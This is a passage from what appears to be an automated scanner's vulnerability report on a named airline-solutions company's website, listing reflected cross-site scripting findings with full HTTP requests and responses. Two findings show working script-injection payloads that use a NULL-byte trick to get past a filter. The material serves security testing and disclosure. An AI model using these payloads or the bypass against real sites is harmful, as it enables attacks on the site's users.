Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:01:00 GMT
Pragma: no-cache
Content-Length: 6863
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>b10196b1995=1">?%006b56e<a>b10196b1995=1</a>
...[SNIP]...

3.81. http://www.sabreairlinesolutions.com/home/includes/form_adi [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada1d"><a>e10d4d698c6 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_adi?iframe=true&width=500&height=500ada1d"><a>e10d4d698c6 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:14:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322592; expires=Thu, 06-Oct-2011 10:14:30 GMT; path=/
Set-Cookie: exp_last_activity=1286378069; expires=Thu, 06-Oct-2011 10:14:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:14:31 GMT
Pragma: no-cache
Content-Length: 2038
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?iframe=true&width=500&height=500ada1d"><a>e10d4d698c6" />
...[SNIP]...

3.82. http://www.sabreairlinesolutions.com/home/includes/form_adi [iframe parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b58"><a>cadaafccb73 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_adi?iframe=true10b58"><a>cadaafccb73&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:08:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322592; expires=Thu, 06-Oct-2011 10:08:30 GMT; path=/
Set-Cookie: exp_last_activity=1286377710; expires=Thu, 06-Oct-2011 10:08:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:08:32 GMT
Pragma: no-cache
Content-Length: 2038
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?iframe=true10b58"><a>cadaafccb73&width=500&height=500" />
...[SNIP]...

3.83. http://www.sabreairlinesolutions.com/home/includes/form_adi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5014"><script>alert(1)</script>0d3bc32002f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5014"><script>alert(1)</script>0d3bc32002f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_adi?%00b5014"><script>alert(1)</script>0d3bc32002f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:23:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:23:48 GMT; path=/
Set-Cookie: exp_last_activity=1286378627; expires=Thu, 06-Oct-2011 10:23:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:23:48 GMT
Pragma: no-cache
Content-Length: 2033
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?%00b5014"><script>alert(1)</script>0d3bc32002f=1" />
...[SNIP]...

3.84. http://www.sabreairlinesolutions.com/home/includes/form_adi [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658b6"><a>f616cacc2b9 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_adi?iframe=true&width=500658b6"><a>f616cacc2b9&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:10:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322592; expires=Thu, 06-Oct-2011 10:10:01 GMT; path=/
Set-Cookie: exp_last_activity=1286377800; expires=Thu, 06-Oct-2011 10:10:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:10:01 GMT
Pragma: no-cache
Content-Length: 2038
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_adi?iframe=true&width=500658b6"><a>f616cacc2b9&height=500" />
...[SNIP]...

3.85. http://www.sabreairlinesolutions.com/home/includes/form_demo [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb7e1"><a>30ed8f77953 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_demo?iframe=true&width=500&height=500eb7e1"><a>30ed8f77953 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:10:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:10:13 GMT; path=/
Set-Cookie: exp_last_activity=1286377813; expires=Thu, 06-Oct-2011 10:10:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:10:13 GMT
Pragma: no-cache
Content-Length: 2269
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?iframe=true&width=500&height=500eb7e1"><a>30ed8f77953" />
...[SNIP]...

3.86. http://www.sabreairlinesolutions.com/home/includes/form_demo [iframe parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee410"><a>29ae69a2159 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_demo?iframe=trueee410"><a>29ae69a2159&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:03:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:04:01 GMT; path=/
Set-Cookie: exp_last_activity=1286377441; expires=Thu, 06-Oct-2011 10:04:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:04:01 GMT
Pragma: no-cache
Content-Length: 2269
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?iframe=trueee410"><a>29ae69a2159&width=500&height=500" />
...[SNIP]...

3.87. http://www.sabreairlinesolutions.com/home/includes/form_demo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080885"><script>alert(1)</script>abc23bad94c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80885"><script>alert(1)</script>abc23bad94c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_demo?%0080885"><script>alert(1)</script>abc23bad94c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322635; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322635; expires=Thu, 06-Oct-2011 10:19:29 GMT; path=/
Set-Cookie: exp_last_activity=1286378369; expires=Thu, 06-Oct-2011 10:19:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:19:29 GMT
Pragma: no-cache
Content-Length: 2264
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?%0080885"><script>alert(1)</script>abc23bad94c=1" />
...[SNIP]...

3.88. http://www.sabreairlinesolutions.com/home/includes/form_demo [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_demo

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab88"><a>1c96e65d21 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_demo?iframe=true&width=5007ab88"><a>1c96e65d21&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airports
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:06:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322632; expires=Thu, 06-Oct-2011 10:06:30 GMT; path=/
Set-Cookie: exp_last_activity=1286377590; expires=Thu, 06-Oct-2011 10:06:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:06:31 GMT
Pragma: no-cache
Content-Length: 2268
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_demo?iframe=true&width=5007ab88"><a>1c96e65d21&height=500" />
...[SNIP]...

3.89. http://www.sabreairlinesolutions.com/home/includes/form_issues [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646a"><a>cdfa7ce7308 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500f646a"><a>cdfa7ce7308 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:06:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 10:06:55 GMT; path=/
Set-Cookie: exp_last_activity=1286377615; expires=Thu, 06-Oct-2011 10:06:55 GMT; path=/
